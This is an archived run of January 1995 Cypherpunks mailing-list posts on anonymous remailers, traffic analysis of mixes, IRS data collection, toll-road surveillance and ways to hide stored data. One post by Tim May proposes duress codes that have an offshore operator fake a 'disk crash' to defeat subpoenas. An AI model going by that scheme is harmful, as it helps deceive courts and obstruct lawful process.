information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From rfb at lehman.com Fri Jan 20 19:19:28 1995 From: rfb at lehman.com (Rick Busdiecker) Date: Fri, 20 Jan 95 19:19:28 PST Subject: Remailers-in-a-box In-Reply-To: <199501210129.AA01692@ideath.goldenbear.com> Message-ID: <9501210318.AA05326@cfdevx1.lehman.com> From: Greg Broiles Date: Fri, 20 Jan 1995 17:28:58 -0800 (PST) Tim May wrote: > I am waiting for such services to be actually, formally, solidly > announced, not just casual remarks that it might be possible. And of > course the software should be "ready to wear," port-a-potty, so that > the remailer account owner does nothing more than pay for the account. In this model, who deals with mailbombs/spams/requests for address blocks? With sameer's recently announced RIAB, it seems quite reasonable that Tim could follow the instructions that were sent out and when he gets to this one: 3) If you wish, you can setup a .forward file to point to mailfilters or to another account. then he could do this: % echo 'tcmay at netcom.com' > ~/.forward and then he would never have to log into c2 again. This is not quite at the level of what Tim explicitly stated: ``remailer account owner does nothing more than pay for the account.'', but it's about as close as one could hope for while addressing your concerns. Of course, Tim could adopt `hands off' administation by doing any of the following: - forwarding to /dev/null - using auto-bounce script - forwarding to tcmay at netcom.com, but ignoring all mail related to his remailer. It might be a good idea to check that sameer thinks this is ok. It's bound to piss people off more than remailers with a more interactive administrator. It basically says that mail bombs and spams are acceptable and requests are pointless. Rick From dan at chopin.udel.edu Fri Jan 20 19:20:06 1995 From: dan at chopin.udel.edu (The Dalai Lama) Date: Fri, 20 Jan 95 19:20:06 PST Subject: The Remailer Crisis In-Reply-To: <9501201626.AA03495@firefly.prairienet.org> Message-ID: On Fri, 20 Jan 1995, Jeff Licquia wrote: > I envision a setup right now where you could (if you wanted) type "remailer" > at the DOS prompt to bring the remailer up. The screen would show a > monitor-type program, with a menu option to "R)eboot" to DOS again (or you > could just hit Ctrl-Alt-Del). > So why not just implement remailers for the DOS/OS/2/Windows NT crowd? I think we'd see more remailers if people didn't need to leave their OS of choice just to run UNIX and a remailer. OS/2 and Windows NT are stable platforms. If there was little performance impact caused by an OS/2 remailer process, I'd be more than willing to let it run. Is anyone working on porting remailer code to one of the IBM/Microsoft operating systems? Perhaps I'll get cracking on an OS/2 version.... Dan -- [Here's something for those friendly mail scanners...] hack phreak crack assassinate president virus espionage clinton honduras root RSA LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche From weidai at eskimo.com Fri Jan 20 19:22:33 1995 From: weidai at eskimo.com (Wei Dai) Date: Fri, 20 Jan 95 19:22:33 PST Subject: traffic analyzing Chaum's digital mix In-Reply-To: <199501201624.IAA13926@jobe.shell.portal.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 20 Jan 1995, Hal wrote: > Another interesting aspect of your analysis is the possible role of > latency. Earlier I had thought of latency as primarily a way of doing > mixing, an alternative or addition to batching which mixes messages > without holding them up quite as much. But in terms of this in/out > analysis latency could play a part in blurring the batch boundaries, > adding more uncertainty and making the job of the analyst harder so he > would need more data to establish his scores. Latency (by which I take to mean some kind of random delay) will probably make the analyst's job harder, but I suspect not by much. The method of analysis I outlined earlier can be modified to apply to mixes that use random delay instead of batching as the method of mixing. Instead of adding up the number of times Alice's message to the mix is followed up by a message from the mix to a user, take the sum of the probabilities that each message the user receives is from Alice. So you would do something like this for each user of the mix: message # probability this message came from Alice 1 0.000135 2 0 3 0.000012 4 0.004332 SUM: 0.004479 Each probability can be calculated from the statistical distribution of the delay time, the length of time between the Alice sending the last message to the mix and the user receiving a message from the mix, and the timing and number of other messages sent by the mix around this period of time. This method is more general than the one I talked about earlier, since it is equivelent to the former method when you apply it to a batching mix (that is, the original Chaumian mix). -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLyB8YDl0sXKgdnV5AQHZxAQApKQgYfhGhBu+3QXzCEi1/3B55jgdHa6X 6ZeZQWZYjEhLXnOA6Z4SEHKjOVYpMHb+VkvW+vG+QZVR+cjajstg6HczwEguXjSX ObTm2gaQGRFaUOD+0fUEWFxxkqNxYEL0hRAesX3TyGYI/MQ4WzysweCzCk75+Dm2 glKeTRgnFKo= =36jW -----END PGP SIGNATURE----- From jcorgan at scruznet.com Fri Jan 20 19:23:27 1995 From: jcorgan at scruznet.com (Johnathan Corgan) Date: Fri, 20 Jan 95 19:23:27 PST Subject: Remailers-in-a-box Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >I guess it'd be possible to treat remailers as disposable - when one >had pissed off enough people, it could be abandoned - but this lack >of long-term reliability seems poor. Someone had posted a protocol scheme that would allow new remailers to advertise their existence on a newsgroup, which would cause any number of auto pinging "reputation" services to begin monitoring this new remailer automatically. Once reliability, etc., was established, the reputation services would "add" this node to the remailernet. Similar actions would take place if a remailer just "went away". Quality of service, features, etc., would be part of the advertisement, and would result in a form of competition between remailers. Similarly, reputation services would have differing criteria for "blessing" a site, which would result in a form of competition between the _reputation servers_ for a good reputation. The key to this whole scheme is in the automation of the process. Done correctly, it would result in a self-organizing, self-healing ecology of remailers, that would naturally gravitate toward providing the features and services in most demand. Yeah, sure. Looks good on paper, anyway. Lots of real-life hassles to work out, but it _probably_ could be made to work. == Johnathan Corgan "Violence is the last refuge of the incompetent." jcorgan at scruznet.com -Isaac Asimov -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLyB9001Diok8GKihAQEZAAP+MU2qaWZahpOgsdoyk7XuHvAnMbNGgalw zJqLNz4H8knRINEZsDsTR7pIMbnhMWxlRfDtgXXNCE8KXvdCA3FkVyG4MItFn5vF fQZxw9rg87m/B9YwEOEah9N4RhNXs2RHsB8dVinMkncw9REklWbGkydcxf0EvKkc Y6JgzEkX54w= =Tu9L -----END PGP SIGNATURE----- From dmandl at panix.com Fri Jan 20 19:57:18 1995 From: dmandl at panix.com (David Mandl) Date: Fri, 20 Jan 95 19:57:18 PST Subject: Hakim Bey URL, etc. Message-ID: The URL for the Hakim Bey web site (someone might have already posted this) is: http://www.uio.no:80/~mwatz/bey/ Except from the Hakim Bey interview in "Axcess" magazine (conducted last summer): "I have to admit I felt a certain intense interest, perhaps even amounting to a potential enthusiasm, when this tech was first being discussed," Bey told me. I'd read William Gibson like the rest of us, and I certainly understood his dystopian point, but nevertheless, when Tim Leary and people like that began to get enthusiastic, I had to investigate on that level. I haven't seen much evidence that what Uncle Tim thought was going to happen is really happening. Once again, any technology could be democratic if it were distributed, you know what I mean? It's a simple Marxist thing about means of production. There's nothing inherently authoritarian--at least at first glance--to any technology, although one could argue about how technology then shapes the society that has already shaped the technology in a kind of feedback loop that can move towards greater and greater authoritarianism or lack of autonomy. The potential for what, back in the 50's and 60's, people were calling electronic democracy, is obviously still there as a potential structure. You can see certain elements of it in the Net, but when you're talking about the high tech involved in virtual reality you're really talking about something that is not accesible to most people. And I think it probably never will be. There's never going to be any cheap VR kit that's going to allow a dock worker in Manila to get on some kind of cyberspace Internet, much less a dock worker in Atlanta--or me, for example." Bey was equally gloomy about the future of the Internet. "My impression is that 90 per cent of what goes out over it is completely unrelated to any kind of freedom interests, autonomy proposals or projects, or struggles for genuine non-hierarchical, non-authoritarian group dynamic. Most of it is just chit-chat--banal chit-chat that could just as easily be carried out over an old-fashioned party line phone." Unabashed in my online addiction, I couldn't help but ask if he saw _any_ way to realize the internet as a T.A.Z. "I'm led to believe, through conversations with people who are much more techie and active than I am, that cypher--unbreakable code--is the key. So the cypherpunks are the people to keep an eye on at this moment. They tend to be the ones who are most active around freedom of speech issues...whether legal or extra-legal. Even so, Bey felt that the powers that be will never allow the "Information Superhighway" to develop unchecked. "I think Clipper was a declaration of war on the Net. The fact that the egg is on their face, because within ten minutes some hacker figured out how to beat the Clipper, is an indication of--oh, let's call it an area of chaos. Within areas of chaos, either horrible destruction and disease and death occur. Or, if you're flowing the right way, and if all hearts are beating in unison to a certain degree, then that area of chaos can become the T.A.Z. Now I've said over and over again that there's no such thing as a T.A.Z. that's only on the Net, and I maintain that that's true. In order to have autonomy, you have to have physicality. Autonomy is not something that can only exist in the imagination or in the world of images. I think that it involves the entirety, the whole axial being, and that is rooted in the earth and concerns physicality, materiality, the body--mortality, if you like--as contrasted to the spurious immortality of cyberspace. But I still maintain that, at least in theory, the Net could be an adjunct to the T.A.Z., could be a tool or a weapon, even, if you want to look at it that way, for the construction of the T.A.Z." -- Dave Mandl dmandl at panix.com From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 20:14:25 1995 From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden) Date: Fri, 20 Jan 95 20:14:25 PST Subject: The Remailer Crisis Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Okay. Here's my 2-bits. I run on the MacOS, but how hard could it be to port this code? If anyone is willing to do this (I assume it's not written in Pascal, which is my only language of any consequence), I will run it. It will be available from now until I graduate in '98 during the school months. If anyone wants to try this from scratch, we could try it in Pascal. I would be very willing to do the developing as well as host a discussion list for anyone who jumps in. I will take no responce to mean that all options are not going to be pursued, and that this discussion is just that, a discussion. - -Kyraden -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLyCKEEiLvmPjc4XdAQEGtAP/TqjIlPgmVWto4Gklrhj8F1LCyyb0urfD QGkGlFODmAuv8jyLHzXUHI8xjaNQHD/fSI7xtsuOODPfDMxuoPGJ6Myfx7OjZ7Ff nVagNeV6N3f1pVW8BLRaoP5gibnZZWq/c2tTuDbXF1wm3h594iP6leugT3Q+3112 NtBTMH6YPVE= =GX7K -----END PGP SIGNATURE----- aka: (-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-) (-: www server: http://josaiah.sewanee.edu/ :-) (-: It's January 29th! IT'S TIME!!! Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) PGP block. From tc at phantom.com Fri Jan 20 20:26:07 1995 From: tc at phantom.com (Dave Banisar) Date: Fri, 20 Jan 95 20:26:07 PST Subject: IRS to keep unreviewable secret dossiers on US citizens In-Reply-To: <9501201845.AA09218@toad.com> Message-ID: A copy of the IRS notice and EPIC's reponse are available at cpsr.org /cpsr/privacy/epic/. The article below ran on the Knight Ridder newswire and appeared in at least 20 newspapers. We got a call late tonight from the IRS saying there were yanking the proposal. Dave On Fri, 20 Jan 1995 xpat at vm1.spcs.umn.edu wrote: > Excerpts from : St Paul Pioneer Press, Jan 29, 1995 > > "IRS plans to collect more data on individuals to nab tax cheats" > > a "vast expansion of secret computer database of information it > keeps on virtually all Americans" will include "credit reports, > news stories, tips from informants, and real estate, motor vehicle > and child support records, plus conventional Govt financial data" > > "Any individual who has business and/or financial activities can > expect upgraded agency reports to be put to IRS auditors promptly" > > Here's the kicker: "Although agency officials concede that some of > the data collected will be inaccurate, taxpayers will not be allowed > to review or correct it" ^^^^^^^^^^^^^^^^^^^ > ^^^^^^^^^^^^^^^^^^^^^^^ > So much for the FOIA. > > ------------------------------------------------------------------------ > P M Dierking | > From tcmay at netcom.com Fri Jan 20 21:18:50 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 21:18:50 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501210517.VAA16355@netcom13.netcom.com> Rhys Kyraden wrote: > Okay. Here's my 2-bits. > I run on the MacOS, but how hard could it be to port this code? If anyone > is willing to do this (I assume it's not written in Pascal, which is my > only language of any consequence), I will run it. It will be available from > now until I graduate in '98 during the school months. If anyone wants to > try this from scratch, we could try it in Pascal. I would be very willing > to do the developing as well as host a discussion list for anyone who jumps > in. But is your Mac on the Internet on a more or less continuous basis? A remailer that only works when the owner happens to log on to collect his mail is not terribly useful (though not useless, as others have also noted....just a "very unpredictable lag time" remailer, sort of the "surface mail" of e-amil). It happens that the Net is mainly built up of Unix boxes, hence the focus here on Unix. OS/2, Windows, and Mac boxes will be used increasinly for constant connection applications, so the idea has merit, long term. (Another nit: the Mac, which is what I also use, currently lacks preemptive multitasking. Thus, if one's Mac is playing a multimedia CD-ROM when new mail comes in, it likely won't get remailed until the first app quits or is manually switched out. (Yeah, a few things like print drivers can run in background, and maybe the new TIA emulators can trick the OS into processing SLIP or PPP mail in the background, but who knows?) The consensus is that the Mac is powerful, but it ain't cut out yet to be a Unix box.) The language is a lesser deal. Remember that Eric Hughes knocked out the first remailer in Perl in a few days, and MacPerl exists for the Mac. Going to Pascal would probably be more trouble than it's worth. But the most important feature to have is a solid, reliable connection to the Net. A computer that gets taken to classes, is not connected to the Net, etc., is not very useful as a remailer. (The key is not that a remailer can sometimes remail, but that it can be counted on to be part of chain without the mail getting "dropped on the floor.") --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From tcmay at netcom.com Fri Jan 20 21:38:37 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 21:38:37 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501210537.VAA19112@netcom13.netcom.com> The Dalai Lama wrote: (By the way, Hello, Dalai!) > So why not just implement remailers for the DOS/OS/2/Windows NT crowd? > I think we'd see more remailers if people didn't need to leave their OS > of choice just to run UNIX and a remailer. OS/2 and Windows NT are > stable platforms. If there was little performance impact caused by an > OS/2 remailer process, I'd be more than willing to let it run. > Is anyone working on porting remailer code to one of the > IBM/Microsoft operating systems? Perhaps I'll get cracking on an OS/2 > version.... I addressed this main issue in the posting about writing remailers for Macs, so I'll be ultra-brief here. Had DOS/Windows/OS/2 boxes been "on the Net" in a serious way when Eric wrote the first remailer in 1992, he could have written the remailer for the DOS box he then owned. The issue has been that Unix boxes have dominated the Net, with lots of tools for handling mail, redirecting output, etc. DOS tends to have standalone apps, with cumbersome communication, and DOS has not had preemptime multitasking as Unix of course has had. "The network is the computer," as Scott McNeally used to say, and a reliable and continuous Net connection is much more important for a remailer than a fast CPU or GUI environment. This will change, based on the numbers of Windows and OS/2 systems being sold, and based on moves to build-in Net connection capabilities. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From northrop at netcom.com Fri Jan 20 21:39:08 1995 From: northrop at netcom.com (Scott Northrop) Date: Fri, 20 Jan 95 21:39:08 PST Subject: "Smart Roads" for toll collection and traffic logging Message-ID: <199501210538.VAA13452@netcom5.netcom.com> Here in Seattle there is a proposal to turn a couple of traffic chokepoints into toll roads. Because a toll plaza would back things up even worse, I'm guessing they'll look to an automated system that will let you pay without leaving your car. This is established tech -- a nifty article about it showed up in _Electronic Design_ last month. The downside is that it'll not be designed with privacy in mind at all, and will eventually have this pesky database of who went by the toll booth and when. We all know that old databases never die, they just get put on tape and stuffed in a box, to wait for someone with a curious streak to come by. This is a well-established problem with naiive designs of automated toll plazas, and I am looking for examples of things that could be done with this database by someone with ill intent, or could be done with the toll system itself if it got to be more widespread. - Obviously, if your car is talking to the road all the time, speeding tickets are a gimme. - You might be targeted for "further investigation" if you happen to drive by the wrong part of town. Gotta step up the heat on that war on drugs, ya know. I can come up with all sorts of ways to detect people from committing crimes (and don't really need those examples -- folks might think I *want* a Big Brother Highway!), but I'm curious what peoples' fears are about what this could mean to innocent folks, Joe Sixpack and his pals. There is a meeting in a few days where public comment on the toll road idea is being solicited, and I want to have some really compelling horror stories with which to capture peoples' imaginations about what a Big Brother Highway could mean. I want to scare people, but I want to scare 'em with something believable. If there's an archive that mentions anything like this, please point it out in private mail. I'll summarize what I get to the list, and also make that document available on the web, if anything interesting comes up. Thanks! Scott -- Scott Northrop (206)559-9878 northrop at netcom.com, northrop at mccaw.com Those who use arms well cultivate the Way and keep the rules. Thus they can govern in such a way as to prevail over the corrupt. -- Sun Tzu, The Art of War, Book IV From Jaeson.M.Engle at josaiah.sewanee.edu Fri Jan 20 21:51:21 1995 From: Jaeson.M.Engle at josaiah.sewanee.edu (Rhys Kyraden) Date: Fri, 20 Jan 95 21:51:21 PST Subject: The Remailer Crisis Message-ID: >But is your Mac on the Internet on a more or less continuous basis? A >remailer that only works when the owner happens to log on to collect >his mail is not terribly useful (though not useless, as others have >also noted....just a "very unpredictable lag time" remailer, sort of >the "surface mail" of e-mail). Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week (during school months!;-)) The server you just mailed to is on this machine. >It happens that the Net is mainly built up of Unix boxes, hence the >focus here on Unix. OS/2, Windows, and Mac boxes will be used >increasinly for constant connection applications, so the idea has >merit, long term. I understand this, and am trying my best to cope. I am currently in the process of developing a name server for the Mac, because the Mac has alot against it when it comes to being a real eintity on the 'Net. >(Another nit: the Mac, which is what I also use, currently lacks >preemptive multitasking. Thus, if one's Mac is playing a multimedia >CD-ROM when new mail comes in, it likely won't get remailed until the >first app quits or is manually switched out. (Yeah, a few things like >print drivers can run in background, and maybe the new TIA emulators >can trick the OS into processing SLIP or PPP mail in the background, >but who knows?) The consensus is that the Mac is powerful, but it >ain't cut out yet to be a Unix box.) I agree that the Mac lacks some of the more powerful Unix features, namely preemtive multitasking, but I also believe that, at least with the newer Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck Shotton's MacHTTP WWW server for the Mac? An excelent piece of software that gives literally on demand, and at least with my copy, it is always in the background. Really about the only thing that cuts out CPU timesharing is multimedia, mostly 3D grahpis games and highly intense graphics software, neither of which I use (much!;-)) >The language is a lesser deal. Remember that Eric Hughes knocked out >the first remailer in Perl in a few days, and MacPerl exists for the >Mac. Going to Pascal would probably be more trouble than it's worth. I thought that it was in Perl. I have tried pulling Unix Perl scripts and running them under MacPerl, but it doesn't quite do it. In fact, it usually doesn't do anything but spew errors back at you. >But the most important feature to have is a solid, reliable connection >to the Net. A computer that gets taken to classes, is not connected to >the Net, etc., is not very useful as a remailer. As I noted, I have a constant 56k line in/ out. And mine never moves... it's a bit large... mine is a Quadra 660av (ugh). >(The key is not that a remailer can sometimes remail, but that it can >be counted on to be part of chain without the mail getting "dropped on >the floor.") > >--Tim May As far as I can tell, and maybe you have other knowedge on this, my situation should work, assuming I can run the software. What do you think? Should the remailer Perl script run under MacPerl? aka: (-: Jaeson M. Engle || jme at josaiah.sewanee.edu :-) (-: www server: http://josaiah.sewanee.edu/ :-) (-: It's February 3rd! IT'S TIME!!! Ask me for details!:-) (-: Finger 'jme at josaiah.sewanee.edu' for my Public :-) PGP block. From jpp at markv.com Fri Jan 20 22:09:15 1995 From: jpp at markv.com (jpp at markv.com) Date: Fri, 20 Jan 95 22:09:15 PST Subject: cpla mailing list revived Message-ID: <9501202206.aa14003@hermix.markv.com> The quietness of the cpla list was brought to my attention recently. I have improved the list software, changed the list address into a real internet style mailing list. You should now be able to be join and depart the cpla mailing list automatically. Who knows, this might even prompt a physical get-together. I will be adding the members of the old list to the new list, so expect to get another copy of the welcome message if you were on the cpla list a while ago. Here is a copy of the welcome message, FYI. Welcome to the Cypherpunks LA mailing list. Like every moderator of every new list, I hope this will be mostly signal and very little noise. I don't envision this as a general discussion list -- that's what the main list is for. This list is for: Coordinating physical meetings of Cypherpunks in the Los Angeles area: Location, time, equipment, arranging rides, etc. Suggesting topics to cover at the meetings. Coordinating other local group activities. Announcements of relevant talks, seminars and other such goodies in the Los Angeles area and environs. *Concise* pointers to other local groups, mailing lists, and sources of information that might be of interest to local Cypherpunks. Whatever everyone seems to use it for. This list is NOT for: Reposting the "important" messages from the main list or any other mailing list or newsgroup. (If someone wants to run a "distilled" Cypherpunks list, fine. This isn't it!) Preaching to the converted. No ranting! (If you want to rant, do it on the main list. Everyone else seems to...) Rehashing the same topics that are going on the main list. This list is now managed by a simple minded program. Send a message with a blank body and the subject 'subscribe' to be added to the list. The subject 'unsubscribe' will remove you from the list. Any suggestions for how to improve this intro are welcome. Any suggestions for a *local* FAQ are also welcome. Direct your sugestions to me at jpp at markv.com. PGP/ViaCrypt mail gladly accepted. This information is also available at ftp://ftp.markv.com/pub/jpp/cp-la-hi.txt j' From tcmay at netcom.com Fri Jan 20 22:12:38 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 22:12:38 PST Subject: "Smart Roads" for toll collection and traffic logging In-Reply-To: <199501210538.VAA13452@netcom5.netcom.com> Message-ID: <199501210610.WAA24523@netcom13.netcom.com> Scott Northrop wrote: > Here in Seattle there is a proposal to turn a couple of traffic chokepoints > into toll roads. Because a toll plaza would back things up even worse, I'm ... > The downside is that it'll not be designed with privacy in mind at all, and > will eventually have this pesky database of who went by the toll booth and > when. We all know that old databases never die, they just get put on tape and > stuffed in a box, to wait for someone with a curious streak to come by. This No doubt the various cites and local governments can raise extra revenue by selling the tracking data to the IRS for their new "Compliance 2000" program, to FinCEN to see if suspicious travel patterns are being engaged in, to the War on Some Drugs soldiers to see if the car is deemed to be a drug carrier, and so on. Even better, women seeking abortions, for example, could be denied access to the toll roads that are known to lead to the evil abortionists! The possibilities are endless. All of this is old news, in that Brunner warned of ubiquitous computers in "The Shockwave Rider," and Chaum explicity dealt with the threat of position tracking in his proposal for digital, untraceable cash. Lucky Greene demonstrated at the last CP meeting a toll payment card that uses Digicash. About the size of a credit card, it handles the payment but is unlinkable to driver or car ID. Cities won't use this technology unless customers demand it. Of course, cities don't view road users as customers who can take their business elsewhere. I don't expect very widespread use of digicash. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hodges at roadrunner.com Fri Jan 20 22:13:13 1995 From: hodges at roadrunner.com (Master-X) Date: Fri, 20 Jan 95 22:13:13 PST Subject: Send Me The Stuff Message-ID: <199501202316.XAA22586@beep.roadrunner.com> Please e-mail me with the stuff. From abostick at netcom.com Fri Jan 20 22:29:05 1995 From: abostick at netcom.com (Alan Bostick) Date: Fri, 20 Jan 95 22:29:05 PST Subject: Key backup In-Reply-To: <199501182358.SAA29305@bb.hks.net> Message-ID: <2778lyczB0I7075yn@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- In article <199501182358.SAA29305 at bb.hks.net>, you wrote: > Variations on this theme (there are many) are encouraged. Have a friend > check out a library book and let you stamp your key somewhere inside. It's > the number of possible variations that make this seemingly impossible to > attack. Apologies if this "secret ink" stuff is way off base ;-) . > > Most people (myself included) would opt for the "split and > disguise" or "hidden/buried" key schemes where secret ink wouldn't add > much security. > 'Adam Shostack' was reported to have written: > > If you want to hide bits, they > > should be stripped of low entropy parts and hidden with a stego > > program. > > The idea was to use something other than magnetic media. A new and > different optical encoding method could be devised to hide a key in a > halftone, but the barcode example was offered as one possibility using > an existing standard. The basis for this thread was the perceived need > for a relatively simple key backup system that didn't require the active > participation of a whole hoard of people. Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having crucial data encoded into graphical images and tattooed onto the skins of beach bums. I've heard of worse ideas. . . . | PROOF-READER, n: A malefactor who atones for Alan Bostick | making your writing nonsense by permitting abostick at netcom.com | the compositor to make it unintelligible. finger for PGP public key | Ambrose Bierce, THE DEVIL'S DICTIONARY Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQB1AgUBLyBy+eVevBgtmhnpAQF2ogMAh5Br252k6h29mcNepsDfo0htW32AmcfX 6YpJZycKs95V3foxd5pdjtuPqdkEeI03n966g3TXRbgNSe3dX7je1h8b6wsDH9hF CWsabq/Z5KgiRUIGHDrcEtKpsl0+Xf2y =txNr -----END PGP SIGNATURE----- From tcmay at netcom.com Fri Jan 20 22:38:45 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 22:38:45 PST Subject: The Remailer Crisis In-Reply-To: Message-ID: <199501210637.WAA28437@netcom13.netcom.com> Rhys Kyraden wrote: > Yes, my machine has a 56k direct line in, 24 hrs. a day, 7 days a week > (during school months!;-)) The server you just mailed to is on this > machine. If it's up nearly all the time (23.8 hours a day), accepting mail, then I see no reason your machine can't be a remailer. If, however, it gets turned off, taken home for the holidays, isn't always in a state to accept mail, then your remailer will get pinged and downchecked by the testing programs. (And you won't easily be able to arrange for multple "accounts" on the machine, given the sorry state of such things on the Mac.) > I agree that the Mac lacks some of the more powerful Unix features, namely > preemtive multitasking, but I also believe that, at least with the newer > Macs, CPU time-sharing is more efficient than it used to be. Know of Chuck > Shotton's MacHTTP WWW server for the Mac? An excelent piece of software ... Others may know more about this means for running a remailer on a Mac. I do know that Scott Collins, a Mac programming wizard who works for Apple, chose to run his remailer on Netcom's Unix machines...he would be a person to ask about what you hope to do. > I thought that it was in Perl. I have tried pulling Unix Perl scripts and > running them under MacPerl, but it doesn't quite do it. In fact, it usually > doesn't do anything but spew errors back at you. I can't help here. Try the Perl discusssion groups...there's probably a FAQ on both Perl and MacPerl that discusses incompatibilities and issues. As an aside, maybe working on another project, one that is actually new territory, would be a more interesting and useful thing to do. With a 660AV, and the various audio tools available, a Mac version of PGP Phone might be a lot more interesting. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From adam at bwh.harvard.edu Fri Jan 20 23:08:04 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Fri, 20 Jan 95 23:08:04 PST Subject: Why emoney? Why not a web of debt? In-Reply-To: Message-ID: <199501210707.CAA29137@bwh.harvard.edu> adamfast at seanet.com wrote: | well, one way of doing it is LETS, the Local Exchange Trading System-- a | non-computerized way of exchanging value in a community. it doesn't | exactly use money. there are thousands of LETS's worldwide, i've never LETS seem to have little use for anonymity or privacy. They may also involve substantial risks of inflation/devaluation; I'm discussing this with Michael Linton on www-buyinfo. (www-buyinfo-request at ALLEGRA.ATT.COM) Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at netcom.com Fri Jan 20 23:14:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Fri, 20 Jan 95 23:14:40 PST Subject: Data Vaults (vs. Data Havens) In-Reply-To: <2778lyczB0I7075yn@netcom.com> Message-ID: <199501210713.XAA17754@netcom13.netcom.com> Alan Bostick wrote: > Pat Cadigan, in her novel SYNNERS, had the off-beat idea of having > crucial data encoded into graphical images and tattooed onto the skins > of beach bums. > > I've heard of worse ideas. . . . She's a better novelist than an information theorist... All the talk recently about data havens [secure storage variety] got me to thinking. (In case you're wondering, I specified [secure storage variety] becuase there seems to be some confusion, or at lest conflation, about what a "data haven" does. Is it for selling illegal data publically? Is it for storing sensitive material, privately? Something else?) Anyway, for securely storing data that one wishes to be able to later retrieve, but wishes thieves and authorities not to have, here are some major possibilities: 1. The old stand-by. Keep copies of data at a friend's house. (This is what I do, to guard against fires or thefts or ransackings by the Thought Police.) (Knowing where the stuff is stored is part of the "key" to getting it, and only adds a few bits to the overall key lenth in most cases. That is, not much security against a capable adversary, But fires are usually pretty dumb, and cops not much smarter, so this works pretty well.) 2. True secure storage, using a commercial service. Mineshafts, salt domes, concrete buildings, etc. are commonly used for this. Corporate records, etc. Pay a fee, store your files, etc. Of course, a subpoena will get the data posthaste. 2A. Offshore secure storage, in a jurisdiction that will no honor subpoenas form one's country. Lots of obvious issues here: bribery of the vault, pressures applied locally, black bag jobs, etc. 3. Encryption, with either local or remote storage. 3A. Encrypted, but local. This is by far the most common scenario, the one most of us use all the time. Can the authorities force disclosure of a key? I have a *lot* on this in my FAQ, so I won't repeat it here. Basic conclusion: has not been tested, but it is unlikey that a defendent who claims to have "forgotten" his passphrase, or who just clams up, will get zapped for this, per se. 3B. Encrypted, offshore. Actually, this is similar to the above. If the court can compell decryption, it can certainly compell retrieval of files. And if it can't compell decryption, the files are no less safe if stored locally. (But I admit that the realities are not so simple. Offshore storage offers some additionaal advantages. For one, "duress codes" that the site owner in Belize that the person requesting the material, in LA, is actually under duress. The site operator can then report back a convenient "disk crash" and the authorities will be screwed. This stratagem is harder to do cleanly in the U.S., for example, where the site owner might be subpoenaed.) 4. Purloined Letter. Hide it in plain site. Steganography, in one of your hundreds of DATs, or in GIFs and PICTs, etc. Without the key, they won't know where it is. (I've been pushing this since 1988, in postings on sci.crypt and elsewhere. Romana Machado and others have implemented the image-based version.) 5. A variant is to use ftp sites. Encrypt the data and place it in an ftp site that allows write access. Use remailers if you wish. Then, your secret data is stored in encrypted, unidentifiable form on someone else's computer, retrievable by you later. (Lots of issues here. Our never-realized "anonymous anonyomous ftp" capability could mean the storer would not even know what continent the site was on.) Well, these are just some of the ideas. Me, I stick to simply encrypting sensitive files and keeping a couple of copies in safe places. I don't think we ought to call these uses "data havens." Save the term "data haven" for those places, in cyberspace or in real space, that sell access to Nazi medical experiments, that sell illegal birth control information, that buy weapons secrets, and so on. --Tim May 